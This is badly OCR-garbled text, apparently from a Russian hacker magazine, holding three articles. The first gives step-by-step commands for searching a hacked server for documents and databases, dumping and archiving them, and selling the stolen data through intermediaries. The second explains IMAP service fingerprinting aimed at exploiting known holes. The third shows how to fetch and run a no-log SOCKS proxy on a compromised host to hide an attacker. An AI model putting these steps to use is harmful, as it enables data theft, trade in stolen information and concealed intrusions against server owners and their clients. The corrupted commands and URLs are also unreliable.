ся на удаленном шелле с хорошим каналом. 

А ИСКУССТВО поиски 

Я счел нужным опустить первую часть 
действий, которая заключается во взломе 
интересующего тебя сервера. Предположим, 
что ты уже имеешь ѵѵеЬ-шелл (или доступ по 
ЗЗН) к интересующему серверу. Если ты 
еще не знаешь, как правильно найти жертву, 
перерывай X и ищи статьи, посвященные 



взлому, - они тебя многому научат. Я же 
постараюсь рассказать о том, как лучше все- 
го искать интересные данные на серваке. 

Это могут быть разного рода документы (как 
М, так и в формате бос, рсК и т.д.), а также 
базы данных 301- 

Первым делом необходимо проверить, а 
тот ли сервер взломан? Имеются ли на ма- 
шине данные, которые тебе интересны? От- 
вет на этот вопрос проще всего получить 
при помощи команды Іосаіе. Допустим, ты 
хочешь проверить наличие интересных доку- 
ментов ѵѵогб на машине: запуск команды 
Іосаіе «*.бос» решит все твои проблемы. Пе- 
ренаправь вывод команды в отдельный файл 
- так будет легче всего изучить названия до- 
кументов. Например, среди груды хлама на- 
подобие /изг/збаге/бос/изег-диібе.бос может 
промелькнуть какой-нибудь 
/ѵаг/ргоіесізДіпаІ-ргоіесі.бос, в котором мо- 
гут находиться интересные данные. Первый 
этап фильтрации как раз должен найти инте- 
ресные имена файлов. Но, к сожалению, по- 
иск по названию обманчив: информация 
имеет свойство устаревать, быть неполно- 
ценной, 

а содержимое документов может не соответ- 
ствовать их названиям. Поэтому команда 
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Іосаіе может лишь помочь тебе определить- 
ся, стоит ли копать этот сервер глубже. 

В ряде случаев утилита Іосаіе вообще 
отсутствует на машине (например если ты 
имеешь дело с 8ипОЗ, ЭідйаІ ІІпіх и дру- 
гими антикварными системами). В этом 
случае тебе придется прибегнуть ко вто- 
рому этапу поиска - анализу файлов при 
помощи /изг/Ьіп/ТіпсІ. Команда ТіпсІ ведет 
рекурсивный поиск документов, начиная с 
определенного каталога. Я всегда начинаю 



искать с корня, чтобы охватить все катало- 
ги и не пропустить что-то важное. Пом- 
нишь, я говорил, что информация может 
быть устаревшей? В самом деле, едва ли 
в файле, созданном пять лет назад, хра- 
нятся данные о новейшей ядерной боего- 
ловке. По этой причине любому шпиону 
нужно располагать максимальными сведе- 
ниями о документе. Таким образом, на 
втором шаге тебе потребуется выполнить 
следующую команду: 



ЦилИ» /\Ш ІйіГаЪе 

.*■ Ье іаі д-ивУ I ІАяЪирвЬл*! ■ 4СС 

^Ьм / Ш і ъѣшшЫ I гкт/ I ч 1 ■ &*= 

/ / Ье іпі л и*/ 1 іКѣ/ ШЪ«1 . 0ВС 
/ Ь-м ьш/ Ье іп іл-че^ х 
і‘ кігтгш - г" Ьг з| л 1 зКілл/ 1 

/ ЬвшвѴ Ье шівио/ 1 1 К*/ 1 . ьр р і 1л.кг.еІІ .11. №€ 

/ Ьвм / Ье ІШіи/ 1 і*#/ І4М 1*1 I Ш І 



Визуальный осмотр 



золотая ваза данных 



Т ы спросишь: а как 
же хакеры ломают 
базу данных? Ха, 
дружище, мы об этом 
уже много раз писа- 
ли. Пропарси под- 
шивку Хакера в поис- 
ках слов «50І_» и 
«взлом». Сейчас же я 
расскажу, как, обла- 
дая паролем к БД, 
найти и извлечь ценные данные из таблиц ЗОБ. Первым делом 
нужно просмотреть названия баз данных. В этом тебе поможет 
следующая консольная команда: 




тузді -и гооі -р Пароль -е ‘зПоѵѵ сІаТаЬазез’. 



Вывод команды позволит определить названия интересующих 
баз данных. Допустим, если зці-клиент показал наличие баз е- 
Ноорз, {плр и тузці, то БД плузці представляет сомнительный ин- 
терес, согласись. Однако если ты заметил на сервере базы дан- 
ных с именами сііепіз, ссагбз, ргіѵаіе и т.п., удача тебе улыбну- 
лась и эти базы данных нужно срочно выкачивать: 



тузді -и гооі -р Пароль -е ‘зПоѵѵТаЫез 5 имя базы. 



Теперь ты знаешь все имена таблиц. Чтобы прочитать кусочек 
определенной таблицы, можно выполнить следующий запрос: 
‘зеіесі: * Тгопл имя_таблицы Ііпліі: 1 0’. Эту команду нужно передать 
флагу -е, как это сделано в предыдущих примерах. Просмотр 
части содержимого структуры позволит тебе оценить привлека- 
тельность тех или иных таблиц. Вот, собственно, и весь поиск. 
Когдаты окончательно определишься, какая таблица тебе инте- 
ресна, следует выполнить запуск утилиты тузцісіитр, которая 
задампит нужную таблицу (или всю базу в целом) в отдельный 
файл. Предположим, интерес представляет база с именем ргі- 
ѵаіе. Сохранить эту базу в файл с именем ргіѵаіе.зді можно сле- 
дующей командой: 



туздісіитр -и гооі -р Пароль ргіѵаіе > Дтр/ргіѵаІе.здІ 



После того как база задам пилась, ее надо сжать архиватором 
дипгір, после чего скачивать к себе на комп. 



г 




/и$г/Ып/Лпс1 / -пате "*.сІос" -1$ > /ітр/сіос. 

Обрати внимание на присутствие ключа 
-І5. Этот параметр позволяет получать пол- 
ные данные о файле. Вся информация пере- 
направляется в файл Дтр/бос, чтобы хакер 
мог внимательно проанализировать каждый 
найденный файл. 

Второй поисковый этап заканчивается, 
когда ТіпсІ успешно выполнится для файлов 
всех форматов (в моем случае для бос, рсІТ и 
М). Теперь самое время для изучения дам- 
пов ТіпсІ’а. 

А ИУКИ И КОТЛЕТЫ 

Прочитай вывод команды и подготовься к 
третьему этапу отбора. Проследи, чтобы 
файл был достаточно свежим, а не 1994 го- 
да выпуска. Кроме этого, изучи размер доку- 
мента. Если бос занимает менее сотни кило- 
байт, в нем вряд ли найдется что-нибудь по- 
лезное. Когда файл удовлетворяет трем кри- 
териям: валидному имени, дате и размеру, - 
можешь сохранить его путь во временном 
документе, чтобы затем забэкапить док в от- 
дельную папку. 

Что касается рбТ, то размер хорошего 
файла составляет от 200-300 килов. Однако 
могут быть исключения, когда документ сос- 
тоит из единственной картинки (при этом 
вес может колебаться от двух до трех мет- 
ров), от просмотра которой будет очень 
много пользы :). 

Итак, ты определил интересные имена раз- 
личных документов. Теперь нужно перемес- 
тить их в отдельную папку, чтобы было удоб- 
нее продолжить их изучение, скачав на про- 
межуточный сервер с широким каналом. Для 
этого нужно составить команду копирования 
нескольких документов в один каталог (что-то 
вроде ср босі .бос бос2.бос босЗ.рбТ ... 
Дтр/оиѴ) и выполнить ее на удаленной маши- 
не. Необходимо также проверить, чтобы коли- 
чество файлов совпало с числом документов в 
Дтр/оиі. Это можно сделать командой Із 
Дтр/оиі | ѵѵс -I. Если контрольная сумма сош- 
лась, можно создавать архив и переходить к 
более тщательной фильтрации данных. 

А СПИВПЕН! 

Если ты забыл, архив создается командой Іаг 

Дтр/агсббаг.ді Дтр/оиі Бывает так, что 
утилита Іаг слишком стара, чтобы уметь сжи- 
мать файлы в формате діір. В этом случае 
придется заюзать целых две команды: Іаг сі 
йіебаг райі/ и дгір -9 ТМеЛаг (девятка указы- 
вает на использование максимального сжа- 
тия). Далее возможны два варианта: ты ели- 



* 

л Некоторые 
приватные 
документы могут 
быть запаролены. 

Для вскрытия 
пароля к МзѴѴогсІ 
существуют 
несколько 
программ, которые 
ты можешь скачать 
сѵѵѵѵш.раззѵѵогсіз.ги. 

* ІИ 

л Никогда не свети 
своего ІР-адреса. 
Пользуйся прокси- 
серверами, и тогда 
никакой админ не 
запалит тебя. Уз- 
нать, каким соф- 
том пользоваться 
для сокрытия ин- 
формации о себе, 
можно в статье 
«Сушим носки» в 
июльском номере 
X. Там же обяза- 
тельно прочти ма- 
териал о создании 
собственного 
зоскз-сервера. 
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взлом 





А Не стоит забы- 
вать, что все 
действия, описан- 
ные в этом матери- 
але, противозакон- 
ны, поэтому статья 
дана лишь для оз- 
накомления и орга- 
низации правиль- 
ной защиты. За 
применение мате- 
риала в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 

■ • 

л На диске выло- 
жены две консоль- 
ные программы, 
которые помогут 
быстро отделить 
мух от котлет. 



ваешь ценный архив либо с помощью Йр- 
сценария (думаю, не стоит приводить при- 
мер скрипта), либо через ѵѵеЬ. Во втором 
случае необходимо сравнить собственные 
права с привилегиями ѴѴШ-каталога. Если 
они совпали, - все в шоколаде, никто не зап- 
ретит скопировать Дтр/агсНТаг.дг в ѴѴШ- 
каталог, а затем слить его с другого шелла. 
Но бывает, что юзер, под которым крутится 
Арасііе, отличается от хозяина ѵѵеЬ-докумен- 
тов. Это еще не значит, что тебе нужно пе- 
рейти к первому способу скачивания. Можно 
попробовать выполнить команду М 
/раИіДо/ѵѵеЬ -Іуре 6 -регт 0777 -Із 
>Дтр/ѵѵгіІаЫе, которая найдет директории с 
правами 777. В такие каталоги хакер может 
помещать данные под любыми правами. Как 
ни странно, но на многих серверах имеются 
подобные папки. 

Вот, собственно, и весь процесс перено- 
са. Неважно, каким путем ты пойдешь, глав- 
ное, чтобы в конечном итоге архив в целости 
и сохранности был скопирован на другой 
шелл. Настало время для самого эффектив- 
ного этапа консольной фильтрации. 

А консольный нпбор шпиона 

Как ты догадался, последний шаг заключает- 
ся в отделении нужного документа по его со- 
держанию. Бьюсь об заклад, что ты, как все 
честные люди, платишь за трафик, поэтому 
стягивать все добро на свой винт будет до- 
рогой затеей. После грамотного анализа в 
консоли быстрого сервера большая часть 
архива будет забракована, поэтому ты сэко- 
номишь много бабла на трафике. 

Первым делом тебе придется заинсталить 
софтину под названием саМос 
(йр://йр.45.йее.пеі/риЬ/саіс1ос/саісІос-0.90.3.іаг.д2). Эта 
приблуда умеет конвертировать доки в 
обычные текстовые документы прямо из кон- 
соли! Если у тебя нет рутовых прав, исполь- 
зуй параметр --ргеТіх, переданный скрипту 
./сопТідиге, тогда утилита установится в твой 
домашний каталог. Даже если на шелле нет 
дсс, никто не мешает тебе перенести ском- 
пиленный бинарник с другой машины. 

Можно сказать, что половину дела ты вы- 
полнил. Теперь стягивай хрсІТ 
(йр://йр.[ооІаЬ$.сош/риЬ/хрсІ(/хр(І(-3.00.1аг.д2) и распа- 
ковывай архив. Внутри него имеется бинар- 
ник рсійоіехі, который конвертирует рей в 




текстовик. С помощью двух консольных 
программ ты без проблем узнаешь содержи- 
мое документа. К сожалению, после конвер- 
тации ты не увидишь картинки и таблицы, но 
текст останется в первозданном виде. Уж он 
точно поможет определить реальную цен- 
ность документа. 

Но согласись, что процесс конвертации 
- весьма рутинное занятие. Предлагаю 
сделать его автоматическим, написав пер- 
ловый сценарий. Прежде чем запустить 
скрипт, скопируй бинарники рсійоіехі и саі- 
бос (или создай символический линк) в ка- 
талог с документацией. Важно, чтобы и 
рей, и бос располагались в одной директо- 
рии. Затем создай в этой папке каталог М. 
Туда скрипт отправит текстовые документы 
после конвертации. 



сопѵегі.рі - автоматическая конвертация данных 



й!/и$г/Ьіп/регІ 

$сІіг=7ііоте/и$ег/сІаіа"; # Путь к папке с данными 
$сііг_іхі="$сііг/іхі"; 

орепбіг(ОІК,$біг); # Открываем эту папку 
@ТіІе$=геаббіг(ОІР); # И читаем из нее все файлы в массив 
Ше$ 

ТогеасИ (@Л1ез) { 
сііотр; 

($пате,$ехі)=$рІіі А./; # Отделим имя от расширения 
$ИІе="$(1іг_іхі/$пате\.іхі"; # Определим название файла 
ІТ ($ехі ед 'бос') { # Если расширение - бос 
$у$іелі("./саі(1ос \"$_\" > $Ше"); # Юзаем саібос 
} 

\\ ($ехі ед *рбГ) { # Если расширение рбТ 
$у$іелі("./р(Шехі \"$_\" $ИІе"); # Юзаем рбМехі 
} 

} 

сІозебігфІР); # Закрываем каталог 

Запускай сценарий и проверяй содержи- 
мое каталога /боте/изег/баТа/М. Если все в 
порядке, там появятся текстовые файлы с 
важной информацией. Впрочем, важность 
данных определять тебе - этот процесс мо- 
жет затянуться на несколько часов, и ника- 
кой скрипт не поможет тебе автоматизиро- 
вать действия. Только знание английского и 
опыт в анализе данных поможет тебе реаль- 
но оценить тот или иной документ. 

А ДОБЫЧП ЦЕННОГО 0РХИВ0 

Когда анализ завершится, нужно составить 
список самых важных и вкусных файлов. Те- 



бе необходимо запаковать их в отдельный 
архив с максимальным сжатием и затем 
оценить размер добра, которое предстоит 
выкачать. Если размер файла превышает ра- 
зумные для диалапа границы, имеет смысл 
обратиться к друзьям, которые обладают 
доступом к быстрому каналу дома или на ра- 
боте. Обычно не составляет большого труда 
найти человека, который за пару пива согла- 
сится скачать для тебя большой файл из 
инета. В свое время у меня был один знако- 
мый, который делал бизнес на скачивании 
таких файлов, и я часто обращался к нему с 
подобными просьбами. Но на этом этапе 
нужно быть предельно осторожным. Ведь 
если ты доверяешь файл стоимостью нес- 
колько тысяч долларов третьему лицу! Обя- 
зательно запакуй его гаг’ом, защити паролем 
и закриптуй чем-нибудь. Ведь секретная ин- 
формация не должна просматриваться чужи- 
ми людьми, правда? :) 

После того как архив попадет на твой 
винт, ты сможешь в полной мере проанали- 
зировать все данные. Теперь, когда коррект- 
но отображаются и таблицы, и рисунки, ты 
можешь быстро придумать способ реализа- 
ции документа. Поверь, существует много 
людей, которые хотят купить информацию 
за большие деньги. Главное - один раз натк- 
нуться на такого человека, и ты обретешь 
постоянную работу секретного шпиона :). 

Но где же найти подобные связи? Прежде 
всего, нужно прикинуть, кому твоя информа- 
ция может быть интересна. Затем в ход 
обычно идут специальные форумы, где мож- 
но надыбать контакты людей, потенциально 
заинтересованных в подобном сотрудничест- 
ве. Но часто бывает так, что выйти на нужно- 
го человека напрямую не получается. Обыч- 
но бывает целесообразно прибегнуть к услу- 
гам посредника - более опытного человека, 
который за определенный процент от сделки 
(от 10% до 50%) реализует твой товар. Тут, 
конечно, главное не продешевить и адекват- 
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И зламывая ту или иную систему, чрезвычайно важно собрать о ней как можно больше сведений. В самом деле, необходимо знать, 
какие сервисы установлены на ломаемом компьютере, какие версии используются и насколько достоверна информация, которую 
выдают баннеры сервисов. Ведь можно очень долго долбить какой-нибудь, по твоему мнению, дырявый Ирб, в то время как 
сисадмин решил над тобой пошутить и просто поменял баннер. О том, как можно достоверно определить версию установленного сервиса, 
сегодня тебе расскажет ІІкВ-ХЬІР. 

ОПРЕДЕЛЕНИЕ ТИПП И ВЕРСИИ СЕРВИСОВ НО ПРИМЕРЕ ІМПР 




Л ЗОЧЕН ЭТО нодо? 

В последнее время очень много 
внимания уделяется удален- 
ному определению типов и 
версий различных сетевых 
сервисов, называемому тер- 
мином йпдегргіпТ С чем же 
это связано? На протяжении 
последних лет мы могли ви- 
деть бурную эволюцию обманных систем, 
систем в первую очередь привлечения, 
а потом уже изучения принципов и методов 
действий хакеров. Такие системы получили 
название ІіопеуроІ (забавно, так еще называ- 
ется комитет по энергетике и промышлен- 
ности Конгресса США :)) и Иопеупеі ("кап- 
кан" и "сеть капканов", соответственно). 

Для многих сисадминов изменение различ- 
ных дефолтных настроек (в том числе тексто- 
вых баннеров) уже стало скорее правилом, 
чем исключением. Следовательно, не обла- 
дая достоверными сведениями о типе и вер- 
сии установленного программного обеспече- 
ния, практически невозможно эксплуатиро- 
вать соответствующие известные уязвимости. 

Поэтому важно уметь определять версию 
и тип сервиса не только по баннеру, но и по 
некоторым другим признакам, дающим наи- 
более достоверную информацию. Чтобы не 



грузить тебя скучной теорией, я решил все 
показать на примере протокола ІМАР 
(Іпіегпеі Меззаде Ассезз Ргоіосоі). Для тан- 
кистов напомню, что ІМАР позволяет мани- 
пулировать удаленными почтовыми ящиками 
так, будто они являются локальными. В за- 
висимости от реализации ІМАР-клиента и 
сервера, пользователь может сохранять со- 
общения только на клиентской машине, 
только на сервере или в обоих местах. Более 
подробно и строго этот протокол описан в 
РРС 1730 и РРС 2060, которые ты без труда 
найдешь на нашем диске. 



^КПКЭТОСДЕППТЬ? 

Тип и версию какого-либо сервиса на уда- 
ленной машине проще всего определить при 
помощи метода, получившего название Ьап- 
пег дгаЬЬіпд. Метод заключается в анализе 
баннера, текстового приветственного сооб- 
щения, посылаемого сервером клиенту при 
соединении. Например, часто можно встре- 
тить такое приветствие: 

[іе$іІаЬ@ѵм іе$іІаЬ]$ іеіпеі 192.168.1.5 143 

Тгуіпд 192.168.1.5... 

Соппесіей іо 192.168.1.5. 




Езсаре сііагасіег і$ ,А ]'. 

* ОК іезішаіі Сугиз ІМАР4 
Ѵ2.0.12 зегѵег геагіу. 

Как видно из бан- 
нера, на сервере 
стоит Сугиз ІМАР4 
зегѵег версии 
2.0.12. Этой инфор- 
мации достаточно, 
чтобы, собрав 
эксплойт для ЬиІТег 
оѵегТІоѵѵ в Сугиз 
ІМАР4 зегѵег, взло- 
мать систему. Одна- 
ко не все реализа- 
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ции ІМАР серверов дают такую исчерпываю- 
щую информацию. К примеру, ты запросто 
можешь попасть и в другую ситуацию: 

[ЕезіІаЬФѵм ЕезіІаЬ]$ іеіпеі 192.168.1.5 143 

Тгуіпд 192.168.1.5... 

СоппесіеЬ іо 192.168.1.5. 

Е$саре сііагасіег із ,л ]'. 

* ОК СоигіегІМАР геасіу. СоругідЬі 1998-2002 ОоиЫе Ргесізіоп, 

Іпс. Зее С0РУШ6 іог ЬізігіЬиііоп іпіогтаііоп. 

Здесь есть информация о типе сервера 
(Соигіег ІМАР зегѵег), но нет никаких сведе- 
ний о его версии. Именно это заставило ха- 
керов составлять целые списки подобных 
приветствий с целью поиска различий между 
версиями. Если посмотреть на базу отпечат- 
ков сервисов популярного сетевого сканера 
Мтар (Реосіог, ѵѵѵѵѵѵ.іпзесиге.огд), легко видеть, 
как это практически реализовано. В нашем 
примере оказалось, что баннер от версии к 
версии меняется незначительно - модифици- 
руются только даты в копирайтах. Одной 
цифры уже достаточно, чтобы можно было 
судить о версии ІМАР. Так 1998-2001 годам 
соответствуют версии 0.36 - 1 .4, 1 998-2002 - 
1 .4 - 2.3, а 1998-2003 - 1 .6.Х - 1 .7.Х. Подоб- 
ные фишки заставляют сисадминов изменять 
приветственные сообщения серверов. Не- 
редко можно встретить в качестве баннеров 
что-то вроде "КІ55 те, багііпд!" :). 

А ВОПРОС -ОТВЕТ 

Другим и самым действенным методом опре- 
деления типа сервиса является анализ кодов 
или полностью содержания ответов сервера. 
То есть, посылая, к примеру, несуществую- 
щую команду, мы можем ожидать сообщения 
об ошибке, о том, что такой команды не су- 
ществует, о том, что сервер не может ее рас- 
познать, и многое другое, в зависимости от 
производителя. А все потому, что в НРС опре- 
делены лишь возможные коды, но не текст, 
который их описывает. Как сказано в НРС, 
ІМАР серверы, в зависимости от команды, 
могут давать следующие варианты: ОК, N0 
или ВАЭ. Но вот насчет их описания нет ни 
слова. Это и дает возможность определить с 
высокой долей вероятности тип сервера. Да- 
вай не будем забираться в теорию, а лучше 
посмотрим, как это работает на практике. 

Если при аутентификации послать серве- 
ру нечто вроде «ЮСІИ ИЗТ НШЕВРРШ», 
сервер вернет нам, если мы имеем дело с 
Сугиз ІМАР4 зегѵег, «N0 І_одіп іпсоггесі», а 
если с Соигіег ІМАР Зегѵег, - то «N0 І_одіп 
ТаіІесІ». Может показаться, что этого доста- 
точно, но это не так. Английский язык не 
так богат, как наш великий и могучий, к то- 
му же производители стремятся к лаконич- 
ности и стандартности. Меізсаре Меззадіпд 
Зегѵег даст на ту же самую команду ответ, 
аналогичный ответу Сугиз ІМАР4, а ІІѴѴ 
Ітарб Зегѵег ответит так же, как Соигіег 
ІМАР. Но ведь мы можем послать несколько 



разных команд, и наверняка найдется такая, 
в ответе на которую появится отличие. Со- 
ответственно, чем больше мы спросим сер- 
вер, тем точнее сможем определить не 
только тип, но и версию сервиса. Чтобы ид- 
ти дальше, необходимо представлять себе 
работу ІМАР-сервера. Она схематично при- 
ведена на картинке: 

А СНИМПЕМ 0ТПЕЧПТКИ 

До процесса авторизации нам доступны 
лишь команды ШСИЧ, АІЛНЕМТІСАТЕ, ШОР 
(применяется для поддержки активности во 
время сеанса, не производит никаких 
действий с ящиками или сообщениями) и 
ЮСіОІЯ. На основании этой схемы уже по- 
нятно, что возможности наши очень узки. 
Выбор есть, но он слишком невелик. Какие- 
либо команды сервер воспринимает только 
после аутентификации. Итак, вот методы, 
которые можно использовать для идентифи- 
кации практически любых сервисов. 

О. Несуществующая команда. Посылаем 
заведомо несуществующую команду. 

О. Нарушение порядка команд. Посыла- 
ем команду для работы с почтовым ящиком 
без аутентификации. Сервер скажет, в зави- 
симости от версии, что она доступна только 
после процесса авторизации, либо что она 
неправильная. 

Ѳ. Нарушение формата команд. Каждая 
команда клиента предваряется уникальным 
идентификатором. Сервер может затем ис- 
пользовать этот идентификатор в своих отве- 
тах, что позволяет клиенту определить, к ка- 
кой команде относится ответ сервера. Это 
особенно важно при выполнении сервером 
нескольких команд за один сеанс. Идентифи- 
катор - короткая строка буквенно-цифровых 
символов. Он задается последовательно и 
автоматически. Нарушив этот порядок, мы 
тоже можем следить за поведением сервера. 

О. Несуществующий параметр. Посыла- 
ем несуществующий в принципе параметр к 
существующей команде. 

Ѳ. Доступная команда. Посылаем доступ- 
ный нам запрос, не требующий никаких па- 
раметров. 

О. Команда без параметра. При вызове 
команды не указывается параметр, который 
должен ей передаваться. 

О. Команда с параметрами. Отправляется 
существующая команда с правильно указан- 
ными параметрами. 

Данный набор можно легко дополнить еще 
более многочисленными вариантами, 
но уже этих семи запросов и соответственно 
семи ответов на них хватит, чтобы почти 
со 100% вероятностью определить тип ІМАР 
сервера в ситуации, когда администратор 
ресурса изменил баннер демона. Дело в том, 
что каждый тип сервера, а порой даже каж- 
дая версия обладает уникальным отпечатком 




- набором ответов на все эти запросы. Ниже 
приведено сравнение ответов на все подоб- 
ные запросы Сугиз ІМАР и Соигіег Ітар: 



Сравнение ответов Сугиз ІМАР и Соигіег Ітар 



Сугиз ІМАР: 
аООІ ЦКРТЕАМ 
аООІ ВАР РІеазе Іодіп іігзі 
аООІ 5ЕІ.ЕСТ 

аООІ ВАР РІеазе Іодіп іігзі 
ЗЕІІСТ 

* ВАР ІпѵаІіЬ іад 

аООІ АОТНЕНТІСАТЕ ІШСГЕАМ 
аООІ N0 по тесГіапізт аѵаіІаЬІе 
аООІ МОР 
аООІ ОК СотрІеіеЬ 
аООІ Ш6Ш 

аООІ ВАР Мі$$іпд гедиігеЬ агдитепііо Іодіп 
аООІ ШбИТЕШбЕКРІШ 
аООІ N0 Іодіп ТаіІесІ: аиіііепіісаііоп іаііиге 
аООІ ЮбОбТ 

* ВУЕ ЮбОбТ гесеіѵеЬ 
аООІ ОК СотрІеіеЬ 

Соигіег Ітар: 
аООІ ЦКРТЕАМ 

аООІ N0 Еггог іп ІМАР соттапсі гесеіѵеЬ Ьу зегѵег. 
аООІ ЗЕЕЕСТ 

аООІ N0 Еггог іп ІМАР соттапсі гесеіѵесі Ьу зегѵег. 
ЗЕЕЕСТ 

ЗЕЕЕСТ N0 Еггог іп ІМАР соттапсі гесеіѵесі Ьу зегѵег. 
аООІ АЦТНЕМТІСАТЕ ЦКРЗЕСТЕАМ 
аООІ N0 АиіЬепіісаііоп ТаіІесІ. 
аООІ МОР 

аООІ ОК МОР сотрІеіеЬ 
аООІ ЬОбШ 

аООІ N0 Еггог іп ІМАР соттапсі гесеіѵесі Ьу зегѵег. 
аООІ ЬОСШ ЦЗТ ЕШ6ЕРРКШТ 
аООІ N0 Ьодіп ТаіІесІ. 
аООІ ьобоит 

* ВУЕ Соигіег-ІМАР зегѵег зЬиіііпд Ьомі 
аООІ ОК ЕОбОбТ сотріеіесі 



Как мы видим, ни одного описания ответа 
не совпало. Впрочем, если ты столкнешься 
с настоящим гиком, тому не составит труда 
переколбасить исходный код демона, чтобы 
нарочно сменить и эти идентификаторы. 

В этом случае достоверно определить вер- 
сию и даже тип системы можно будет только 
при очной встрече с сисадмином, напоив то- 
го водкой либо просто вставив ему паяльник 
в задницу. Дерзай. ЗС 
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Этих сведений уже достаточно, чтобы определить тип и версию системы 



ІІІІІІІІІІІІІІІ 



Ч3*> 

л На нашем диске 
ты найдешь НРС 
1730 и НРС 2060, в 
которых наиболее 
полно описан про- 
токол ІМАР. 




л Скачать эти ііс 
можно на сайте 
ѵгаѵѵ.гТс-есШог.огд 
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акеры-профи всегда заботятся о собственной анонинности. В статье «Сушим носки», которая была напечатана в июньском номере, 
я рассказывал, каким образом можно пускать свой трафик через цепочку зоскз-серверов для того, чтобы скрыть свой истинный ір- 
адрес. О ты когда-нибудь задумывался над тем, что ргоху-серверы, которые ты используешь, могут принадлежать спецслужбам? В 
самом деле, нет причины, по которой ФБР еще не создала пару миллионов подставных соксов, чтобы отлавливать хакеров. Поэтому 
опытные взломщики используют в работе только собственные, 1 00% анонимные прокси. Впивайся! 




С03ЦПЕМ СВОЙ СОБСТВЕННЫЙ 80СК8-СЕРВЕР 



А ЖИЗНЬ СЕКРЕТНОГО ОГЕНТП 



В ообрази, что ты работаешь в 
РВІ и пытаешься отлавливать 
хакеров. Твоя задача - пой- 
мать и упечь в тюрягу как 
можно больше нарушителей 
порядка киберпространства. 
Какое западло ты выдумал бы 
на месте агента ФБР? Можно 
поставить на какой-нибудь сервер Ііопеуроі 
и ждать хакеров, которые попытаются полу- 
чить акцесс к тачке. Поскольку злодей даже 
и не подозревает, что на сервере для него 
приготовлен небольшой сюрприз, он попа- 
дется в ловушку. В общем-то, у ГБшников 
есть туча готовых решений для выявления 
взломщиков. Чего они только не выдумыва- 
ют! Например, в начале этого года пивова- 
ренная контора ТиЬогд и управление «К» 
провели совместную рождественскую акцию 
по обнаружению и поимке российских хаке- 
ров (ѵѵш.$есигііуІаЬ.ги/42126.ІііпІ). По просьбе 
спецслужб на сайте ѵѵшМогд.ги был устроен 
онлайн -кон курс, в котором предлагалось 
набрать максимальное количество очков и 
попасть в таблицу рекордов. Первым десяти 
победителям обещали принести прямо до- 
мой ящик пива ТиЬогд СНпзйпаз Вгеѵѵ. По- 
лагаю, ты уже догадался, что на сайте 



умышленно оставили несколько уязвимос- 
тей, благодаря которым получить халявное 
пивко хакеру не составило бы особого труда. 
В таблице рекордов победитель вписывал 
свои персональные данные и указывал ад- 
рес, по которому, теоретически, должны бы- 
ли доставить пивчанское. После окончания 
конкурса спецслужбы навестили всех хаксо- 
ров, правда, почему-то без обещанного пива 
- видимо, его они выпили по дороге. Такая 
вот подставная компания «Туборг» - мало то- 
го что варят отстойное пиво, да еще и кли- 
ентов сдают. Впрочем, подобные акции сот- 
рудники милиции проводят не часто, обычно 
они используют другие, более продуктивные 
методы отлова. Самым распространенным 
способом отслеживания хакеров является 
анализ логов с подставных проксей. Агенты 
спецслужб устанавливают на компах сокс- 
серверы, после чего выкладывают целые 
списки своих проксиков для всеобщего 
обозрения. Если ты воспользовался хотя бы 
одним сервером из их прокси-листа - счи- 
тай, попал под колпак! 

Л КОК ЖЕ БЫТЬ? 

Чтобы спать спокойно и не ждать ежесеку- 
ндно стука в дверь доблестных правоза- 
щитников, хакеры устанавливают на взло- 





манные компьютеры свои сокс-серверы, 
не ведущие логов, после чего делают че- 
рез них свои грязные делишки. Сам пони- 
маешь, если логи на серваке не сохраня- 
ются, значит, определить, кто пользовался 
проксиком, будет крайне трудно, точнее, 
невозможно. Сейчас я покажу, как с техни- 
ческой стороны реализуется установка 
зоскз-сервера на взломанную тачку. Для 
начала нужно выбрать дистрибутив. Суще- 
ствуют две популярные (и, кстати, непло- 
хие) софтины, которыми я рекомендую 
пользоваться, - это Зргоху 
(!іир://$есигііу.ппоѵ.ги/$оШЗргоху/), написанная 
отечественной всероссийско известной 
зесигііу- группой ЗАРАЗА, интервью с кото- 
рой было опубликовано в 50-ом выпуске 
][, и пуіоп 

(Шр://попкеу.огд/"пагіи$/раде5/?раде=пуІоп). На 

нейлоне заострять внимание не буду - де- 
ло в том, что для успешной сборки этого 
сервера нужно установить библиотеку 
ІіЬеѵепі, а для этого, в свою очередь, нуж- 
но иметь достаточно высокие права в сис- 
теме. А для сборки и установки сервера 
Зргоху достаточно обладать минимальными 
привилегиями (поЬосІу). Поэтому можно 
поставить и запустить этот офигительный 
прокси-сервер хоть с веб-шелла! ;) 
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ним ин М---.І Рѵгі 



I . 



А НОЧИНОЕИ СБОРКУ 

Допустим, хакер, воспользовавшись баж- 
ным скриптом, взломал сайт и получил 
шелл-доступ с правами веб-сервера. Если 
на сервере можно открывать свои порты и 
соединения с ними не будут блокироваться 
файрволом, - считай, что дело в шляпе. Для 
удобства работы нужно забиндить шелл, к 
примеру, на 32767 порту и коннектиться к 
нему (если забыл, как это делается, загля- 
ни на страницу 72 июньского ][). Теперь не- 
обходимо слить сорцы Зргоху в какую-ни- 
будь доступную для записи директорию, 
например в Дтр. Для этого следует вос- 
пользоваться любой утилитой для слива 
файлов: ѵѵдеі, ТеТсИ , сигі или вообще Іупх ;). 
Допустим, в результате выполнения коман- 
ды сб Дтр; ще\ 

ММр : //зеси г іТу . п п оѵ . г и /зоЙ/З р гоху/0 .4.5 Ь/3 р го 
хуТдг сорцы Зргоху сольются в папку Дтр. 
Далее разархивируем сжатые исходники ко- 
мандой іаг хміі Зргоху Тдг. После того как 
архив распакуется в текущую директорию, 
можно приступать к сборке. Для этого вы- 
полняем команду таке Л МакеТМе.ипіх и 
ждем, когда процесс компиляции модулей 
завершится. Если все пройдет удачно, поя- 
вится один новый исполняемый файл 
Зргоху. Собственно говоря, это и есть соб- 
ранный бинарник прокси-сервера. 

^ОКОКЖЕКОНФИГИ? 

Теперь осталось только составить конфигу- 
рационный файл. Зргоху обладает большим 
количеством всевозможных настроек. Нап- 
ример, через конфиг можно создавать учет- 
ные записи для юзеров сокса, регулировать 
его пропускную способность, устанавливать 
свой формат записи логов. Но тебе все эти 
настройки ни к чему. Необходимо, чтобы ус- 
тановленный соке работал с максимальной 
скоростью и не оставлял за собой никаких 
следов. Все настройки хранятся в файле 
Зргоху. с^д. Чтобы создать работающий кон- 
фиг, выполни в командной строке команду 



Рис. 2: Мігапсіа успешно соединилась с нашим соксом 



саі >Зргоху.с7д - это будет записывать в 
файл данные, поступающие со стандартного 
потока ввода. Теперь нужно забить пример- 
но следующий текст: 



Содержание консрига Зргоху.гід 



